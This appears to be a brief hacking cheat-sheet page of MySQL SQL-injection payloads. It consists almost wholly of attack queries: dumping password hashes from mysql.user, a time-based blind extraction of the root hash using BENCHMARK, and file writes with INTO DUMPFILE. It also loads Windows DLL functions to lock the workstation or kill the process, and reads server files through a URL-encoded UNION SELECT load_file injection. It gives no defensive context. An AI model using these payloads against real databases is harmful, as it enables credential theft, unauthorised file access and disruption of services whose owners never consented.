Table of Contents

Hacking - SQL Injection - MySQL - Users

Users

SELECT USER,Password FROM mysql.user;
 
SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) USER,Password FROM mysql.user WHERE USER = 'root';

Write query into a new file (can not modify existing files):

SELECT ... INTO DUMPFILE

UDF (User-Defined Functions)

CREATE FUNCTION LockWorkStation RETURNS INTEGER SONAME 'user32';
SELECT LockWorkStation(); 
CREATE FUNCTION ExitProcess RETURNS INTEGER SONAME 'kernel32';
SELECT exitprocess();
 
SELECT USER();
SELECT password,USER() FROM mysql.user;

First byte of admin hash

SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;

Read File

query.php?USER=1+UNION+SELECT+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1